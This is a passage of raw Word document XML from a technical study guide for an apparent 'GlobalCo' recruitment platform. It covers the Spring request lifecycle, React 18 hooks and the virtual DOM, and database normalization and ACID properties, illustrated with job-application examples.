              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CLIENT HTTP REQUEST</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[Spring Security Filter Chain]  &lt;-- JwtAuthenticationFilter checks token</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[DispatcherServlet]             &lt;-- Core Front Controller in Spring WebMVC</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 xml:space="preserve">   1. HandlerMapping            &lt;-- Identifies target @RestController method</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 xml:space="preserve">   2. HandlerAdapter            &lt;-- Invokes controller with parameter resolution</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 xml:space="preserve">   3. Controller Execution      &lt;-- Runs JobController.getJobById(id)</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 xml:space="preserve">   4. Service Layer             &lt;-- JobService runs business logic</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 xml:space="preserve">   5. Repository Layer          &lt;-- Spring Data JPA issues SQL query</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 xml:space="preserve">   6. HttpMessageConverter      &lt;-- Jackson converts Java DTO -&gt; JSON bytes</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HTTP 200 OK (JSON Payload) TO CLIENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. React 18 &amp; The Modern Frontend Paradigm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Philosophy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>React is a declarative, component-based JavaScript library for building user interfaces. Instead of manually manipulating the browser's Document Object Model (DOM) via document.getElementById(), React lets developers describe what the UI should look like for a given state, and React automatically updates the browser efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Real DOM Bottleneck: The browser's DOM is a tree representation of HTML elements. Directly reading and writing to the real DOM (e.g., creating 500 table rows) causes expensive browser reflows and repaints, resulting in UI lag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The Virtual DOM: React maintains a lightweight, in-memory JavaScript representation of the real DOM. When state changes, React creates a new Virtual DOM tree.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Reconciliation &amp; Diffing Algorithm: React compares the new Virtual DOM with the previous snapshot using a heuristic O(N) diffing algorithm. It calculates the minimum set of mutations needed and applies them in a single batch to the real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>React Fiber Architecture: React 18's underlying reconciliation engine. It enables concurrent rendering by breaking rendering work into incremental units (fibers) that can be paused, prioritized, or aborted, ensuring the browser main thread never freezes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4.1 React Hooks in GlobalCo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>useState: Manages component-local reactive state (e.g., search keywords, loading spinners, form inputs). Triggers re-renders upon state mutation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>useEffect: Executes side-effects after rendering (e.g., fetching job lists from /api/jobs when the page loads, setting up timers, synchronizing localStorage).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>useContext: Consumes shared global state across the component tree without 'prop drilling'. Used in AuthContext to provide user profile, token, and login/logout methods to any screen.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>useMemo &amp; useCallback: Performance optimization hooks that cache expensive calculations or memoize callback function references to prevent unnecessary child re-renders.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. Relational Databases, Normalization &amp; ACID Guarantees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Core Principles: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A Relational Database Management System (RDBMS) organizes structured data into tables consisting of rows (records) and columns (attributes). Relationships between tables are enforced mathematically using Primary Keys and Foreign Keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Primary Key (PK): An attribute or set of attributes that uniquely identifies each row in a table (e.g., id in users table). Cannot be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Foreign Key (FK): An attribute in one table that references the Primary Key of another table (e.g., candidate_id in applications references id in users), establishing referential integrity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Cascading Operations: Dictates what occurs when a referenced parent record is deleted or updated (e.g., CASCADE deletes child records; RESTRICT blocks parent deletion if children exist).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5.1 Database Normalization: 1NF, 2NF, and 3NF</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2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Normal Form</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mathematical Rule / Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Problem It Prevents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>GlobalCo Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1NF (First Normal Form)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Each table column must contain atomic (indivisible) values; no repeating groups or arrays.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cannot query or index individual items inside comma-separated text.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Skills are not stored as 'Java, React' strings; they are isolated in a separate skills table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2NF (Second Normal Form)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Must be in 1NF and all non-key attributes must depend on the ENTIRE primary key (no partial dependencies).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Redundant repetition of data in composite key tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Application record contains only candidate_id, job_id, and status; candidate name is not duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3NF (Third Normal Form)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Must be in 2NF and no transitive dependencies (non-key attribute depends on another non-key attribute).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Update anomalies (updating company name requires updating 1,000 job rows).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Company details (website, logo) are normalized into companies; jobs table holds only company_id FK.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5.2 ACID Properties Explained with Recruitment Workflows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3216"/>
        <w:gridCol w:w="3216"/>
        <w:gridCol w:w="3216"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ACID Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Engineering Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Recruitment Domain Concrete Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Atomicity ('All or Nothing')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A transaction must complete in its entirety or roll back completely. No partial state is ever saved.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>When applying for a job, both the Application entity and Notification record must be saved. If notification creation fails, the application insert rolls back.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Consistency ('Rules Enforced')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A transaction brings the database from one valid state to another, satisfying all constraints, cascades, and triggers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Database enforces UNIQUE (job_id, candidate_id). Under concurrent apply requests, the database rejects the second request, preserving integrity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Isolation ('Concurrent Independence')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Concurrent execution of transactions results in a system state that would be obtained if executed serially.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4896"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Two recruiters updating candidate statuses simultaneously cannot corrupt each other's audit logs or write dirty reads.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Durability ('Survives Crashes')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3312"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
